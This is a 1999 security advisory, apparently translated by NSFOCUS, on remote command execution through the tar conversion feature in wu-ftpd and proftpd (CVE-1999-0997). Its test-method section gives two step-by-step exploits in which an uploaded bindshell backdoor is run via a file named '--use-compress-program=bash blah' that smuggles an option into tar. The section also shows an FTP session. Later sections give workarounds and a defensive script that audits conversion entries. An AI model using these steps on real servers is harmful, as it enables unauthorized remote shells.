Remote command execution through the FTP "conversion" feature in multiple vendors' servers

Published: 1999-12-20
Updated: 1999-12-20

Affected systems:
Washington University wu-ftpd 2.4.2 (beta 18) VR4
    - Caldera  eDesktop 2.4
    - Caldera  eServer 2.3.1
    - Caldera  eServer 2.3
    - Caldera Open Linux 2.4
    - RedHat Linux 6.0 alpha
    - RedHat Linux 6.0 sparc
    - RedHat Linux 6.0 x86
Washington University wu-ftpd 2.5.0
    - Caldera  eDesktop 2.4
    - Caldera  eServer 2.3.1
    - Caldera  eServer 2.3
    - Caldera Open Linux 2.4
    - RedHat Linux 6.0 sparc
    - RedHat Linux 6.0 x86
    - RedHat Linux 6.0 alpha
Washington University wu-ftpd 2.6.0
    - Conectiva Linux 5.1
    - Conectiva Linux 5.0
    - Conectiva Linux 4.2
    - Conectiva Linux 4.1
    - Conectiva Linux 4.0 es
    - Conectiva Linux 4.0
    - Debian Linux 2.2 arm
    - Debian Linux 2.2 68k
    - Debian Linux 2.2 powerpc
    - Debian Linux 2.2 alpha
    - Debian Linux 2.2 sparc
    - FreeBSD 4.4
    - FreeBSD 4.3-STABLE
    - FreeBSD 4.3-RELEASE
    - FreeBSD 4.3
    - RedHat Linux 6.2 sparc
    - RedHat Linux 6.2 x86
    - RedHat Linux 6.2 alpha
    - RedHat Linux 6.1 alpha
    - RedHat Linux 6.1 sparc
    - RedHat Linux 6.1
    - RedHat Linux 6.1 x86
    - RedHat Linux 6.0 x86
    - RedHat Linux 6.0 alpha
    - RedHat Linux 6.0 sparc
    - RedHat Linux 6.0
    - RedHat Linux 5.2 x86
    - RedHat Linux 5.2
    - RedHat Linux 5.2 alpha
    - RedHat Linux 5.2 sparc
    - SuSE Linux 7.3 powerpc
    - SuSE Linux 7.3 sparc
    - SuSE Linux 7.3 i386
    - SuSE Linux 7.2
    - SuSE Linux 7.2 i386
    - SuSE Linux 7.1
    - SuSE Linux 7.1 powerpc
    - SuSE Linux 7.1 alpha
    - SuSE Linux 7.1 sparc
    - SuSE Linux 7.1 i386
    - SuSE Linux 7.0 sparc
    - SuSE Linux 7.0 i386
    - SuSE Linux 7.0
    - SuSE Linux 7.0 powerpc
    - SuSE Linux 7.0 alpha
    - SuSE Linux 6.4 alpha
    - SuSE Linux 6.4
    - SuSE Linux 6.3
    - SuSE Linux 6.3 alpha
    - SuSE Linux 6.2
    - SuSE Linux 6.1 alpha
    - SuSE Linux 6.1
    - Turbo Linux 4.0
    - Wirex Immunix OS Linux 6.2
Description:
BUGTRAQ ID: 2240
CVE(CAN) ID: CVE-1999-0997

Some FTP servers offer a "conversion" feature: before a file is sent to the user, it is piped through a program that processes it.

On some FTP server configurations this feature is a vulnerability: a remote attacker can use the conversion feature to execute arbitrary commands on the server.

When an FTP client requests a file name with .tar, .tar.gz, .Z or .gz appended, some FTP servers automatically run a program such as /bin/tar to archive or compress the file and send the result to the client; this is implemented through a pipe. A command like tar is itself able to run other programs, so by requesting a specially chosen file name an intruder can make the FTP server start a remote shell. On some platforms (such as Linux), wu-ftpd 2.6.0 and earlier and the proftpd FTP server are known to be affected. Exploiting this vulnerability requires that the attacker be able to upload files.


<*Source: suid (suid@suid.edu)
  
  Links: http://packetstormsecurity.nl/advisories/suid/001.txt
         http://packetstormsecurity.nl/advisories/suid/001_addendum.txt
         http://www.opennet.ru/base/netsoft/86.txt.html
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Users assume all risk!

suid (suid@suid.edu) provided the following test method:

With a valid FTP account on the server, the difficulty goes right down. You also have the added
benefit of not being stuck in a chroot() environment at the end. Local exploit time.
The exploit goes along much the same lines as the anonymous FTP exploit does:
Create a backdoor, using bindshell from our previous example:
$ gcc bindshell.c -o b -static
If you can perform a SITE CHMOD (default for normal non-anon users on wu-ftpd), then you can
use the following script example. Create a script to exec the desired commands:
$ cat > blah
#!/bin/bash
./b &
^D
Now create empty file "--use-compress-program=bash blah"
$ > "--use-compress-program=bash blah"
FTP to your target, login with your username/password. Upload your 3 files:
ftp> put b
ftp> put blah
ftp> put "--use-compress-program=bash blah"
Do a SITE CHMOD for b and blah:
ftp> quote SITE CHMOD 0755 b
ftp> quote SITE CHMOD 0755 blah
Now get your file:
ftp> get "--use-compress-program=bash blah".tar
That's all there is to it. You now should have a shell on whatever port you specified.
---
An alternative exploit that bypasses the need to use SITE CHMOD has been suggested by SecuriTeam.com (this can be accomplished over anonymous FTP):
"This vulnerability is simple to exploit. However to exploit it you must be able to upload/download files. (e.g. a mode 0777 incoming directory).
For the purposes of this exploit you also need a shell in the remote path. For example, a RedHat machine with the anonftp package installed has exactly what you need.
First, assuming you are running the same platform as your target, statically compile some sort of backdoor program. A simple example is bindshell.c.
$ gcc bindshell.c -o b -static
Then, tar this up. You will need to tar it up because the remote side will rarely have the ability to change permissions at this stage.
(SITE CHMOD rarely works on anonymous ftp sites)
$ tar -cf b.tar b
Create a script of things you want to do on the remote site, this will be interpreted by bash or sh.
$ cat > blah
#
/bin/tar -xf b.tar
./b
^D
Leave the first line as a comment.
Create an empty file called "--use-compress-program=sh blah"
$ > "--use-compress-program=sh blah"
Connect to your target ftp server.
$ ftp localhost
Connected to localhost.
220 localhost.localdomain FTP server (Version wu-2.6.0(1) Tue Sep 21 10:10:10 EDT 2000) ready.
Name (localhost:suid): ftp
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Change to your world-writable directory:
ftp> cd /incoming
Store your files:
ftp> put blah
ftp> put b.tar
ftp> put "--use-compress-program=sh blah"
Now using TAR conversion, get your "--use-compress-program=sh blah" file.
ftp> get "--use-compress-program=sh blah".tar
It should open a connection then freeze. Now telnet to your bindshell port."

Recommendations:
Temporary workaround:

If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* This intrusion technique requires the ability to upload files. Configure the FTP server correctly and forbid users from uploading files.

* Configure the FTP server so that users cannot have files compressed or decompressed on the server side.
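The description above explains that the conversion feature substitutes the client-chosen file name into an external command line, and the workaround asks administrators to remove server-side compression. The script below, added here as an example and not NSFOCUS, suid or wu-ftpd code, audits a wu-ftpd style ftpconversions file, rates each entry that hands the client-chosen name to an external program (tar-based entries highest, since tar's own options can run other programs), shows the guard a server would need before building such a command, and emits a hardened copy with the risky entries commented out. It assumes the eight-field colon-separated ftpconversions layout (strip prefix, strip postfix, add-on prefix, add-on postfix, external command, types, options, description), that the server fills %s with the requested name and splits the result on whitespace before exec, and the constructed sample file embedded in the script.

```python
"""Audit a wu-ftpd style ftpconversions file and guard conversion requests.

Added example for this advisory; not NSFOCUS, suid or wu-ftpd code.
Assumed: eight colon-separated fields per entry, %s replaced by the
client-supplied name, whitespace splitting of the result before exec.
"""
from dataclasses import dataclass

# Constructed sample, shaped like the example file shipped with wu-ftpd.
SAMPLE_FTPCONVERSIONS = """\
# strip_prefix:strip_postfix:addon_prefix:addon_postfix:command:types:options:description
 :.Z:  :  :/bin/compress -d -c %s:T_REG|T_ASCII:O_UNCOMPRESS:UNCOMPRESS
 :   : :.Z:/bin/compress -c %s:T_REG:O_COMPRESS:COMPRESS
 :.gz: :  :/bin/gzip -cd %s:T_REG|T_ASCII:O_UNCOMPRESS:GUNZIP
 :   : :.gz:/bin/gzip -9 -c %s:T_REG:O_COMPRESS:GZIP
 :   : :.tar:/bin/tar -c -f - %s:T_REG|T_DIR:O_TAR:TAR
 :   : :.tar.Z:/bin/tar -c -Z -f - %s:T_REG|T_DIR:O_COMPRESS|O_TAR:TAR+COMPRESS
 :   : :.tar.gz:/bin/tar -c -z -f - %s:T_REG|T_DIR:O_COMPRESS|O_TAR:TAR+GZIP
"""

# Programs whose option syntax can hand control to another program
# (the advisory's case is tar's --use-compress-program).
PROGRAM_RUNNERS = {"tar"}


@dataclass
class Conversion:
    strip_prefix: str
    strip_postfix: str
    addon_prefix: str
    addon_postfix: str
    command: str
    types: str
    options: str
    description: str


def parse_ftpconversions(text):
    """Parse the file into Conversion records, skipping blanks and comments."""
    entries = []
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        fields = [f.strip() for f in raw.split(":")]
        if len(fields) != 8:
            raise ValueError(f"expected 8 fields, got {len(fields)}: {raw!r}")
        entries.append(Conversion(*fields))
    return entries


def audit(entries):
    """Rate every entry that passes the client-chosen name to an external program.

    Returns (description, program, severity) tuples; entries without %s never
    see client input and are skipped.
    """
    findings = []
    for e in entries:
        if "%s" not in e.command:
            continue
        prog = e.command.split()[0].rsplit("/", 1)[-1]
        severity = "high" if prog in PROGRAM_RUNNERS else "medium"
        findings.append((e.description, prog, severity))
    return findings


def option_like_tokens(name):
    """Argv tokens the name turns into after whitespace splitting that look like options."""
    return [t for t in name.split() if t.startswith("-")]


def name_is_safe_for_conversion(name):
    """Server-side guard: refuse a conversion whose name the program would read as options."""
    base = name.rsplit("/", 1)[-1]
    if not base or base.startswith("-"):
        return False
    return not option_like_tokens(name)


def harden(text, drop=("high", "medium")):
    """Return the file with every entry at the given severities commented out.

    The default disables every external conversion, which is the state the
    advisory recommends; pass drop=("high",) to disable only the tar entries.
    """
    out = []
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            out.append(raw)
            continue
        rated = audit(parse_ftpconversions(raw))
        if rated and rated[0][2] in drop:
            out.append("# disabled: " + raw.strip())
        else:
            out.append(raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for desc, prog, sev in audit(parse_ftpconversions(SAMPLE_FTPCONVERSIONS)):
        print(f"{sev:6} {desc:13} via {prog}")
    print(harden(SAMPLE_FTPCONVERSIONS, drop=("high",)))
```

Run it against a server's real ftpconversions to see which conversions expose a client-chosen name to an external program; the tar entries are the ones this advisory concerns, because a name that splits into tokens beginning with "-" is parsed by tar as options rather than as a path. Disabling the entries (or removing the file) is the durable fix; the name guard only illustrates the check a server would need if conversions had to stay enabled.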

Vendor patches:

Washington University
---------------------
The vendor has fixed this security issue in the latest version of the software; please download it from the vendor's home page:

http://www.wu-ftpd.org/

This security vulnerability was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.